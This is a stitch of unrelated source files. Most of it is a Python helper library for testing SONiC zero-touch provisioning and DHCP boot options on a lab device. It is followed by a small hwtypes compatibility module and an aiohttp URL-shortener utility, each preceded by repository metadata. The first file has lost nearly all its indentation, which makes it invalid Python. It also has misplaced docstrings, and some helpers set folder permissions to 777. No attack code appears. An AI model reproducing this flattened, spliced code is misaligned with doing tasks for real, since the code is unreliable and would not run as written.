def verify_ztp_status(dut, retry_cnt=0, iteration=300, retry=3, expect_reboot=False, reboot_on_success=list(), cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to verify ZTP status
:param dut:
:param retry_cnt:
:return:
"""
retry_count_if_no_response = 0
if retry_cnt:
return _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=cli_type)
else:
st.log("Verifying the ZTP status with iteration method ...")
for _ in range(1, iteration + 1):
response = show_ztp_status(dut, expect_reboot=expect_reboot, cli_type=cli_type)
if not response:
st.log("Observed no response in ZTP status ... retrying {} .. ".format(retry_count_if_no_response))
if retry_count_if_no_response > 5:
st.error("show ztp status returned empty data...")
return False
st.wait(retry)
retry_count_if_no_response += 1
continue
if "service" not in response or "status" not in response or "adminmode" not in response:
st.log("Values of service or status or adminmode is not populated yet, retrying ...")
st.wait(10)
continue
if response["adminmode"] == "True":
if "service" not in response or "status" not in response or "adminmode" not in response:
st.log("Values of service or status or adminmode is not populated yet, retrying ...")
st.wait(retry)
else:
# return verify_ztp_status(dut)
st.log("Found that admin mode as {}".format(response["adminmode"]))
if response["service"] == "Inactive":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
return True
else:
st.log("ZTP status is not in expected values , retrying...")
st.wait(retry)
# return verify_ztp_status(dut)
elif response["service"] == "Processing" or response["service"] == "Active Discovery":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "IN-PROGRESS":
st.log("Found that status as {}".format(response["status"]))
st.log("Files - {}".format(response["filenames"]))
if reboot_on_success and "filenames" in response and response["filenames"]:
reboot_flag = list(reboot_on_success) if isinstance(reboot_on_success, list) else [reboot_on_success]
if len(response["filenames"]) > 0:
filenames = response["filenames"][0]
for filename in reboot_flag:
if filename in filenames and filenames[filename] == "SUCCESS":
return True
if cli_type == "klish":
if len(response["filenames"]) > 0:
for key,value in response["filenames"][0].items():
if ("configdb-json" in key or "graphservice" in key) and value == "IN-PROGRESS":
st.wait(300)
st.wait(retry)
# return verify_ztp_status(dut)
elif response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "Not Started":
st.log("Found that status as {}".format(response["status"]))
st.wait(retry)
# return verify_ztp_status(dut)
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
st.wait(retry)
# return verify_ztp_status(dut)
else:
st.log("ZTP status is not in expected values, retrying...")
st.wait(retry)
elif response["service"] == "SUCCESS":
st.log("Found that service as {}".format(response["service"]))
return True
else:
st.log("Found that ZTP is disabled hence enabling it ..")
ztp_operations(dut, "enable")
# ztp_operations(dut, "run")
# return verify_ztp_status(dut)
return False
def get_ztp_timestamp_obj(ztp_timestamp):
"""
Author: <NAME> (<EMAIL>)
API to get ztp timestamp
:param ztp_timestamp:
:return:
"""
try:
return datetime.datetime.strptime(ztp_timestamp, '%Y-%m-%d %H:%M:%S')
except ValueError as e:
st.error(e)
def enable_ztp_if_disabled(dut, iteration=5, delay=1, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to enable ztp if it is disabled, added check for enable in polling mechanism
Author: <NAME> (<EMAIL>)
:param dut:
:param iteration:
:param delay:
:return:
"""
i = 1
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if "adminmode" in response and response["adminmode"] != "True":
st.log("Enabling ZTP ...")
ztp_operations(dut, "enable")
break
if i > iteration:
st.log("ZTP admin mode not found after max iterations ...")
break
i += 1
st.wait(delay)
i = 1
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if "adminmode" in response and response["adminmode"] == "True":
st.log("Admin mode enabled at {} iteration".format(i))
return True
if i > iteration:
st.log("Max iteration {} count reached ".format(i))
return False
i += 1
st.wait(delay)
def ztp_operations(dut, operation, cli_type="", max_time=0):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to do ZTP operations
:param dut:
:param operation:
:return:
"""
if cli_type == "click":
supported_opers = ["run", "enable", "disable"]
if operation not in supported_opers:
return False
if operation in ["run", "disable"]:
command = "ztp {} -y".format(operation)
else:
command = "ztp {}".format(operation)
elif cli_type == "klish":
no_form = "no" if operation == "disable" else ""
command = "{} ztp enable".format(no_form)
st.config(dut, command, type=cli_type, max_time=max_time)
def ztp_push_full_config(dut, cli_type=""):
"""
NOT USED ANYWHERE
Author: <NAME> (<EMAIL>)
APU to push full config
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
config_dbjson = "config_db.json"
config_file = "ztp_data_local.json"
plugin_file_path = "/etc/sonic/ztp/{}".format(config_file)
source = "/tmp/{}".format(config_dbjson)
plugin_json = {config_dbjson: {"url": {"source": "file://{}".format(source),
"timeout": 300}, "save-config": "true"}}
file_path = basic_obj.write_to_json_file(plugin_json)
st.upload_file_to_dut(dut, file_path, plugin_file_path)
running_config = switch_conf_obj.get_running_config(dut)
file_path = basic_obj.write_to_json_file(running_config)
st.upload_file_to_dut(dut, file_path, source)
st.wait(wait_5)
ztp_operations(dut, "run")
st.wait(wait_60)
show_ztp_status(dut, cli_type=cli_type)
st.wait(wait_10)
show_ztp_status(dut, cli_type=cli_type)
def prepare_and_write_option_67_config_string(ssh_conn_obj, static_ip, config_path, config_file, dhcp_config_file, type="http"):
"""
NOT USED ANYWHERE
Author: <NAME> (<EMAIL>)
Common function to write option 67 to DHCP server
:param ssh_conn_obj:
:param static_ip:
:param config_path:
:param config_file:
:param dhcp_config_file:
:param type:
:return:
"""
option_67_config = "option bootfile-name"
if type == "http":
config_json_url = "http://{}{}/{}".format(static_ip, config_path, config_file)
elif type == "tftp":
config_json_url = "tftp://{}/{}/{}".format(static_ip, config_path, config_file)
elif type == "ftp":
config_json_url = "ftp://{}/{}/{}".format(static_ip, config_path, config_file)
option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
option_67_config_string, dhcp_config_file):
st.log("Written content in file {} not found".format(dhcp_config_file))
st.report_fail("content_not_found")
def write_option_67_to_dhcp_server(ssh_conn_obj, data):
"""
    NOT USED ANYWHERE
:param ssh_conn_obj:
:param data:
:return:
"""
option_67_config = "option bootfile-name"
if data.type == "http":
config_json_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "tftp":
config_json_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "ftp":
config_json_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
option_67_config_string, data.dhcp_config_file):
st.log("Written content in file {} not found".format(data.dhcp_config_file))
st.report_fail("content_not_found")
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
def config_and_verify_dhcp_option(ssh_conn_obj, dut, ztp_params, data, expect_reboot=False, reboot_on_success=list(), cli_type=""):
"""
Common function to configure DHCP option along with status / logs verification
Author: <NAME> (<EMAIL>)
:param ssh_conn_obj:
:param dut:
:param ztp_params:
:param data:
:return:
"""
cli_type = st.get_ui_type(dut,cli_type=cli_type)
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
retry_count = data.retry_count if "retry_count" in data and data.retry_count else 0
iteration = data.iteration if "iteration" in data and data.iteration else 300
delay = data.delay if "delay" in data and data.delay else 3
if "func_name" in data:
syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
# basic_obj.copy_config_db_to_temp(dut, data.config_db_path, data.config_db_temp)
if "config_file_type" in data and data.config_file_type == "text":
file_path = "/tmp/file_temp.json"
basic_obj.write_to_file(ssh_conn_obj, data.json_content, file_path, device="server")
elif "config_file_type" in data and data.config_file_type == "EoL":
file_path = ""
else:
file_path = basic_obj.write_to_json_file(data.json_content)
if file_path:
destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_file)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
if "config_db_location" in data and data.config_db_location == "json":
st.download_file_from_dut(dut, data.config_db_temp, file_path)
destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_db_file_name)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
if "scenario" in data and data.scenario == "invalid-json":
st.log("Writing invalid content to make invalid json ...")
basic_obj.write_to_file_to_line(ssh_conn_obj, ",", 5, destination_path, "server")
if data.option_type == "67":
st.log("Creating {} file on DHCP server ...".format(data.config_file))
data.search_pattern = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
data.option_string = "option bootfile-name"
if data.type == "http":
data.option_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "tftp":
data.option_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "ftp":
data.option_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
write_option_to_dhcp_server(ssh_conn_obj, data)
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
# write_option_67_to_dhcp_server(ssh_conn_obj, data)
data.device_action = "reboot" if cli_type == "klish" else data.device_action
if data.device_action == "reboot":
reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
basic_obj.remove_file(dut, data.config_db_path)
st.reboot(dut, reboot_type, skip_port_wait=True)
st.wait_system_status(dut, 500)
elif data.device_action == "run":
ztp_operations(dut, data.device_action)
if "band_type" in data and data.band_type=="inband":
if not basic_obj.poll_for_system_status(dut):
st.log("Sytem is not ready ..")
st.report_env_fail("system_not_ready")
if not basic_obj.check_interface_status(dut, ztp_params.oob_port,"up"):
basic_obj.ifconfig_operation(dut, ztp_params.oob_port, "down")
interface_status = basic_obj.check_interface_status(dut, ztp_params.inband_port, "up")
if interface_status is not None:
if not interface_status:
intf_obj.interface_noshutdown(dut, ztp_params.inband_port, cli_type=cli_type)
if "service" in data and data.service == "disable":
basic_obj.service_operations_by_systemctl(dut, "ztp", "stop")
if basic_obj.verify_service_status(dut, "ztp"):
st.log("ZTP status is not stopped")
st.report_fail("service_not_stopped", "ztp")
basic_obj.service_operations_by_systemctl(dut, "ztp", "start")
if not poll_ztp_status(dut, ["IN-PROGRESS", "Not Started", "SUCCESS"], cli_type=cli_type):
st.report_fail("ztp_max_polling_interval")
if "check" in data and data.check == "not":
if verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
else:
st.log("Iteration count {}".format(iteration))
st.log("REBOOT ON SUCCESS - {}".format(reboot_on_success))
if reboot_on_success:
if "configdb-json" in reboot_on_success:
st.wait_system_reboot(dut)
st.wait_system_status(dut, 300)
result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=reboot_on_success, cli_type=cli_type)
else:
result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
if not result:
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
if reboot_on_success:
output = show_ztp_status(dut, cli_type=cli_type)
if output["status"] != "SUCCESS":
st.wait(300, "Waiting for device to reboot after success...")
st.wait_system_status(dut, 300)
# st.wait_system_reboot(dut)
if not verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
st.banner(boot_up_obj.sonic_installer_list(dut))
verify_ztp_filename_logs(dut, data)
if "ztp_log_string" in data and data.ztp_log_string:
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1, data.ztp_log_string))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
if "result" in data and data.result == "pass":
st.report_pass("test_case_passed")
def write_option_239_to_dhcp_server(ssh_conn_obj, data):
st.log("##################### Writing option 239 to dhcp config file ... ##################")
option_239 = 'option provision-url ='
provisioning_script_path = "http://{}{}/{}".format(data["server_ip"], data["config_path"], data["provision_script"])
option_239_config = '{} "{}";'.format(option_239, provisioning_script_path)
option_67_config = "option bootfile-name"
basic_obj.write_update_file(ssh_conn_obj, option_67_config,
"##", data["dhcp_config_file"])
if not basic_obj.write_update_file(ssh_conn_obj, option_239,
option_239_config, data["dhcp_config_file"]):
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def write_option_225_to_dhcp_server(ssh_conn_obj, data):
option_225 = "option option-225 ="
option_225_path = data["minigraph_path"]
option_225_config = '{} "{}";'.format(option_225, option_225_path)
option_67_config = "option bootfile-name"
option_239 = 'option provision-url ='
basic_obj.write_update_file(ssh_conn_obj, option_67_config,
"##", data["dhcp_config_file"])
basic_obj.write_update_file(ssh_conn_obj, option_239,
"##", data["dhcp_config_file"])
if not basic_obj.write_update_file(ssh_conn_obj, option_225,
option_225_config, data["dhcp_config_file"]):
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def config_and_verify_option_225(ssh_conn_obj, dut, ztp_params, data, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
if data.option_type == "225":
if "func_name" in data:
syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
data.search_pattern = r'\s*option option-225\s*\S*\s*"\S+";'
data.option_string = "option option-225 " # "option dhcp6.boot-file-url "
data.option_url = data.minigraph_path
data.option_type = "option_67"
clear_options_from_dhcp_server(ssh_conn_obj, data)
data.option_type = "option_239"
clear_options_from_dhcp_server(ssh_conn_obj, data)
write_option_to_dhcp_server(ssh_conn_obj, data)
# write_option_225_to_dhcp_server(ssh_conn_obj, data)
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
data.device_action = "reboot" if cli_type == "klish" else data.device_action
if data.device_action == "reboot":
reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
basic_obj.remove_file(dut, data.config_db_path)
st.reboot(dut, reboot_type, skip_port_wait=True)
st.wait_system_status(dut, 400)
elif data.device_action == "run":
ztp_operations(dut, data.device_action)
if not verify_ztp_status(dut, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
verify_ztp_filename_logs(dut, data)
if "ztp_log_string" in data and data.ztp_log_string:
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
data.ztp_log_string))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
def verify_ztp_attributes(dut, property, value, cli_type=""):
    """
    Verify the given ZTP attribute against the provided value
    Author: <NAME> (<EMAIL>)
    :param dut: dut object
    :param property: status, service, adminmode, filenames, timestamp, source
    :param value: a string for scalar properties; for "filenames" a dict such as
    {'03-test-plugin': 'Not Started', '02-test-plugin': 'Not Started', 'configdb-json': 'Not Started'}
    :return: boolean
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
response = show_ztp_status(dut, cli_type=cli_type)
if not response:
return False
if property in response:
if property == "filenames":
filenames = response["filenames"][0]
            for filename, status in filenames.items():
if value[filename] != status:
return False
else:
if response[property] != value:
return False
else:
return False
return True
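# Illustrative usage (values are hypothetical, not taken from the test suite):
#   verify_ztp_attributes(dut, "status", "SUCCESS")
#   verify_ztp_attributes(dut, "filenames", {"configdb-json": "SUCCESS", "02-test-plugin": "SUCCESS"})
# Scalar properties are compared directly; "filenames" is checked entry by entry.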
def verify_ztp_filename_logs(dut, data, status="SUCCESS", condition="positive"):
"""
Author: <NAME> (<EMAIL>)
API to verify logs
:param dut:
:param data:
:param status:
:return:
"""
filenames = list([str(e) for e in data.file_names]) if isinstance(data.file_names, list) else [data.file_names]
log_msg = data.log_msg if "log_msg" in data and data.log_msg else "Checking configuration section {} result: {}"
match = data.match if "match" in data else ""
for file_name in filenames:
log_string_1 = log_msg.format(file_name, status)
st.log(log_string_1)
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, log_string_1, match=match):
if condition == "positive":
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, log_string_1))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, log_string_1, match=match):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
log_string_1))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, log_string_1)
else:
return True
else:
return True
def config_ztp_backdoor_options(dut, ztp_cfg={"admin-mode": True, "restart-ztp-interval": 30}, dut_ztp_cfg_file="/host/ztp/ztp_cfg.json"):
"""
Author: <NAME> (<EMAIL>)
Function to enable backward options for ZTP
:param dut:
:param ztp_cfg:
:param dut_ztp_cfg_file:
:return:
"""
ztp_cfg_file = basic_obj.write_to_json_file(ztp_cfg)
st.upload_file_to_dut(dut, ztp_cfg_file, dut_ztp_cfg_file)
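# For reference, the default ztp_cfg above is serialized to JSON and uploaded to
# /host/ztp/ztp_cfg.json on the DUT, ending up as, e.g.:
#   {"admin-mode": true, "restart-ztp-interval": 30}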
def ztp_status_verbose(dut, cli_type=""):
    """
    API to get the verbose ztp status output, including each file name and its details,
    in the same shape as the regular ztp status API
    Author: <NAME> (<EMAIL>)
    :param dut:
    :return:
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
command = "sudo ztp status -v" if cli_type == "click" else "show ztp-status"
if cli_type == "click":
return st.show(dut, command, type=cli_type)
else:
return show_ztp_status(dut, cli_type=cli_type)
def verify_plugin_chronological_order(dut, cli_type=""):
    """
    API to verify the plugin chronological order of ztp status
    Author: <NAME> (<EMAIL>)
    :param dut:
    :return:
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
st.log("Verifying timestamp for chronological order ... ")
output = ztp_status_verbose(dut, cli_type=cli_type)
data = list()
if cli_type == "click":
for val in output:
data.append(val["filetimestamp"])
else:
for val in output["timestamps"]:
for _, timestamp in val.items():
data.append(timestamp)
data.sort()
for i, _ in enumerate(data):
if i + 1 < len(data):
result = utils_obj.date_time_delta(data[i], data[i + 1], True)
st.log(result)
if result[0] < 0 or result[1] < 0:
st.log("Observed timestamp difference is not as expected ...")
return False
return True
def verify_dhclient_on_interface(dut, search_string, interface, expected_count=2):
"""
API to verify DHCLIENT on provided interface using ps aux command
Author: <NAME> (<EMAIL>)
:param dut:
:param search_string:
:param interface:
:param expected_count:
:return:
"""
st.log("Verifying dhclient for {} interface".format(interface))
ps_aux = basic_obj.get_ps_aux(dut, search_string)
# if len(ps_aux) != expected_count:
st.log("Observed {} DHCLIENT entries on {} interface".format(len(ps_aux), interface))
# return False
dhclient_str = "/run/dhclient.{}.pid".format(interface)
if not ps_aux:
st.error("DHCLIENT process not found on DUT ...")
return False
for entry in ps_aux:
if dhclient_str in entry["command"]:
st.log("Required dhclient is found ...")
return True
return False
def create_required_folders(conn_obj, path_list):
"""
API to create folders as per the provided path in bulk
    :param conn_obj:
    :param path_list:
:return:
"""
path_list = [path_list] if type(path_list) is str else list([str(e) for e in path_list])
for path in path_list:
basic_obj.make_dir(conn_obj, path, "server")
basic_obj.change_permissions(conn_obj, path, 777, "server")
def config_dhcpv6_options(ssh_conn_obj, ztp_params, config_params, options=dict(), cli_type=""):
"""
Common function to configure dhcpv6 options and verify the result on both inband and out of band interfaces
:param ssh_conn_obj:
:param ztp_params:
:param config_params:
:param options:
:return:
"""
cli_type = st.get_ui_type(config_params.dut, cli_type=cli_type)
retry_count = config_params.retry_count if "retry_count" in config_params and config_params.retry_count else 0
iteration = config_params.iteration if "iteration" in config_params and config_params.iteration else 300
delay = config_params.delay if "delay" in config_params and config_params.delay else 3
    expect_reboot = True if "expect_reboot" in options and options["expect_reboot"] else False
st.log(config_params)
if "func_name" in config_params:
syslog_file_names = ["syslog_1_{}".format(config_params.func_name), "syslog_{}".format(config_params.func_name)]
if "json_content" in config_params:
file_path = basic_obj.write_to_json_file(config_params.json_content)
st.log(file_path)
if file_path:
destination_path = "{}{}/{}".format(config_params.home_path, ztp_params.config_path, config_params.ztp_file)
st.log(destination_path)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
config_params.option_59_url = "http://[{}]{}/{}".format(config_params.static_ip, ztp_params.config_path, config_params.ztp_file)
config_params.search_pattern = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
write_option_59_to_dhcp_server(ssh_conn_obj, config_params)
basic_obj.service_operations(ssh_conn_obj, config_params.dhcp6_service_name, "restart", "server")
if not verify_dhcpd_service_status(ssh_conn_obj, config_params.dhcpd6_pid):
st.log("{} service is running which is not expected".format(config_params.dhcp6_service_name))
st.report_fail("service_running_not_expected", config_params.dhcp6_service_name)
reboot_type = config_params.reboot_type if "reboot_type" in config_params and config_params.reboot_type else "normal"
if "ztp_operation" in config_params:
config_params.ztp_operation = "reboot" if cli_type == "klish" else config_params.ztp_operation
if config_params.ztp_operation == "reboot":
basic_obj.remove_file(config_params.dut, config_params.config_db_path)
st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
elif config_params.ztp_operation == "run":
ztp_operations(config_params.dut, config_params.ztp_operation)
else:
st.log("ZTP operation is not mentioned hence rebooting the device ...")
basic_obj.remove_file(config_params.dut, config_params.config_db_path)
st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
if "reboot_on_success" in options and options["reboot_on_success"]:
result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=options["reboot_on_success"], cli_type=cli_type)
else:
result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
if not result:
if "logs_path" in config_params and "func_name" in config_params:
capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
if "reboot_on_success" in options and options["reboot_on_success"]:
reboot_obj.config_reload(config_params.dut)
st.wait(5)
if not ip_obj.ping(config_params.dut, config_params.static_ip, family="ipv6"):
st.log("Pinging to DHCP server failed from DUT, issue either with DUT or server")
# intf_obj.enable_dhcp_on_interface(config_params.dut, config_params.network_port, "v6")
if not verify_ztp_status(config_params.dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in config_params and "func_name" in config_params:
capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
verify_ztp_filename_logs(config_params.dut, config_params)
if "ztp_log_string" in config_params and config_params.ztp_log_string:
if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path, config_params.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path, config_params.ztp_log_string))
if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path_1, config_params.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path_1, config_params.ztp_log_string))
st.report_fail("ztp_log_verification_failed", config_params.ztp_log_path_1, config_params.ztp_log_string)
if "result" in config_params and config_params.result == "pass":
st.report_pass("test_case_passed")
def write_option_59_to_dhcp_server(connection_obj, data):
"""
API to add option 59 in DHCP config file.
:param connection_obj:
:param data:
:return:
"""
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
option_59 = "option dhcp6.boot-file-url "
option_59_path = data["option_59_url"]
option_59_config = "'{} \"{}\";'".format(option_59, option_59_path)
if line_number >= 0:
basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
basic_obj.write_to_file(connection_obj, option_59_config, data.dhcp_config_file, device="server")
# else:
# basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
# basic_obj.write_to_file_to_line(connection_obj, option_59_config, line_number, data.dhcp_config_file, device="server")
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
    if line_number <= 0:
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def write_option_to_dhcp_server(connection_obj, data):
"""
    Common API to replace a matched line with a new one
:param connection_obj:
:param data:
:return:
"""
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
option = data.option_string # "option dhcp6.boot-file-url "
option_path = data.option_url
st.log("#####LINE NUMBER{}".format(line_number))
option_config = "'{} \"{}\";'".format(option, option_path)
if int(line_number) > 0:
# line_number = data.line_number if line_number in data else 60
basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
basic_obj.write_to_file(connection_obj, option_config, data.dhcp_config_file, device="server")
# basic_obj.write_to_file_to_line(connection_obj, option_config, line_number, data.dhcp_config_file, device="server")
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
st.log("#####LINE NUMBER{}".format(line_number))
if line_number <= 0:
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def clear_options_from_dhcp_server(connection_obj, data):
st.log("Clearing OPTIONS from DHCP server")
option = ""
if "option_type" in data and data.option_type == "option_67":
option = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
elif "option_type" in data and data.option_type == "option_239":
option = r'\s*option\s+provision-url\s*\S*\s*"\S+";'
elif "option_type" in data and data.option_type == "option_59":
option = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
elif "option_type" in data and data.option_type == "option_225":
option = r'\s*option option-225\s*\S*\s*"\S+";'
st.log("OPTION is {}".format(option))
st.log("CONFIG FILE is {}".format(data.dhcp_config_file))
if option:
line_number = basic_obj.get_file_number_with_regex(connection_obj,
option, data.dhcp_config_file)
if line_number > 0:
basic_obj.delete_line_using_line_number(connection_obj, line_number,
data.dhcp_config_file)
def verify_dhcpd_service_status(dut, process_id):
"""
API to verify DHCLIENT on provided interface using ps aux command
Author: <NAME> (<EMAIL>)
:param dut:
:param search_string:
:param interface:
:param expected_count:
:return:
"""
st.log("Verifying DHCPD for {} ".format(process_id))
dhcpd_pid = "/run/dhcp-server/{}".format(process_id)
ps_aux = basic_obj.get_ps_aux(dut, dhcpd_pid, device="server")
st.log(ps_aux)
config_string = ""
if process_id == "dhcpd6.pid":
config_string = "-cf /etc/dhcp/dhcpd6.conf"
if process_id == "dhcpd.pid":
config_string = "-cf /etc/dhcp/dhcpd.conf"
st.log("Verifying the output with {}".format(config_string))
if config_string not in ps_aux:
st.log("Required DHCPD service not found ...")
return False
return True
def capture_syslogs(dut, destination_path, file_name):
file_names = list(file_name) if isinstance(file_name, list) else [file_name]
syslog_paths = ["/var/log/syslog.1", "/var/log/syslog"]
for i, syslog_path in enumerate(syslog_paths):
dst_file = "{}/{}".format(destination_path, file_names[i])
st.download_file_from_dut(dut, syslog_path, dst_file)
return True
|
hwtypes/compatibility.py | splhack/hwtypes | 167 | 32604 | import sys
__all__ = ['IntegerTypes', 'StringTypes']
if sys.version_info < (3,):
IntegerTypes = (int, long)
StringTypes = (str, unicode)
long = long
import __builtin__ as builtins
else:
IntegerTypes = (int,)
StringTypes = (str,)
long = int
import builtins
|
demos/shortify/shortify/utils.py | Ixyk-Wolf/aiohttp-demos | 649 | 32616 | import aioredis
import trafaret as t
import yaml
from aiohttp import web
CONFIG_TRAFARET = t.Dict(
{
t.Key('redis'): t.Dict(
{
'port': t.Int(),
'host': t.String(),
'db': t.Int(),
'minsize': t.Int(),
'maxsize': t.Int(),
}
),
'host': t.IP,
'port': t.Int(),
}
)
def load_config(fname):
with open(fname, 'rt') as f:
        data = yaml.safe_load(f)
return CONFIG_TRAFARET.check(data)
async def init_redis(conf, loop):
pool = await aioredis.create_redis_pool(
(conf['host'], conf['port']),
minsize=conf['minsize'],
maxsize=conf['maxsize'],
loop=loop,
)
return pool
CHARS = "abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789"
def encode(num, alphabet=CHARS):
if num == 0:
return alphabet[0]
arr = []
base = len(alphabet)
while num:
num, rem = divmod(num, base)
arr.append(alphabet[rem])
arr.reverse()
return ''.join(arr)
ShortifyRequest = t.Dict({t.Key('url'): t.URL})
def fetch_url(data):
try:
data = ShortifyRequest(data)
except t.DataError:
        raise web.HTTPBadRequest(text='URL is not valid')
return data['url']
|
